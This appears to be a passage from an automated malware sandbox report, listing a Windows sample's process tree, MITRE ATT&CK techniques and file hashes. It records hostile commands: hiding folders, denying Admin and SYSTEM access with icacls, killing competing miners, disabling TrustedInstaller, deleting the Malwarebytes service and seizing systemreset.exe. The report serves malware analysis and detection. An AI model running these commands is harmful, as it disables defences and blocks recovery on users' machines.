- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\programdata\Windowsdriver"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\Windowsdriver" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\Windows\WindowsDefender"4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WindowsDefender" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM bvhost.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\roaming\bvhost"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\bvhost" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nssm.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM infodown.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM infoweb.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windowsdeffenders.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\syswow64\hhsm" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windir.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windir.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM lum.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM syslog.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Local\syslog"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\syslog /deny Admin:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM wutphost.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Local\wutphost"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\wutphost /deny Admin:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "Audio Emulation System.exe" /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM winlg.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\GoogleSoftware /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pythonw.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UsersControl.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM WindowHelperStorageHostSystemThread118466.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM WindowHelperStorageHostSystemThread100040.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM WindowHelperStorageHostSystemThread106333.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM wup.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\local\temp\wup"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\temp\wup /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\temp\wup /deny system:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DriversI /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM minergate-cli.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM msvc.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Roaming\Svcms"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\Svcms /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\Svcms /deny system:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM FileSystemDriver.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Local\FileSystemDriver"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\FileSystemDriver /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\FileSystemDriver /deny system:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM geckof.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Local\geckof"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\geckof /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\geckof /deny system:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM initwin.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\initwin /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\initwin /deny system:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM packagest.exe /F4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\packagest /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\packagest /deny system:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM ursb.exe /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hssvc.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM xmrig.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\system32\hs /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM pythonw.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\gpupdate.exegpupdate /force4⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CPU.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\sc.exesc config trustedinstaller start= Disabled4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f c:\windows\system32\systemreset.exe4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\System32\systemreset.exe /setowner Admin4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\windows\System32\systemreset.exe" /grant:r Admin:F4⤵
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
1Hidden Users
1Impair Defenses
5Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
35KB
MD5dad58eed25efd2b546df6c00a3a8f2de
SHA1ebfadd893b3c180d9bae609426b54e2b9e1031bc
SHA256833584a88f27a0032168635ada5328c37645d103d8839a49e2e69765b9709747
SHA512ae72c0d3752fed32b63cb5fed9f47a5b9d08ecef50fa4c5219e11fce2e7c7e4f8a1def20cb9335e9cb27635591dfe034334c6a37fccc39ba68b7551ed224ad38
-
Filesize
149B
MD553c898c41adece457d5f852819fe312c
SHA1a903277870d632c2c07af2ad1250509cac412f5c
SHA2564d0bc7e392bbacc9a61ba323eea9f492b568416d39c9ad29f1fd77f2b422f556
SHA51243e6b2105b5a1ca796df069320cf3b137d0f4ff16ebbf262eb37e6935519a7da26f21a5e95edf247d47896609f25e624b2bd96db6d73e397c161ddff2bf9e074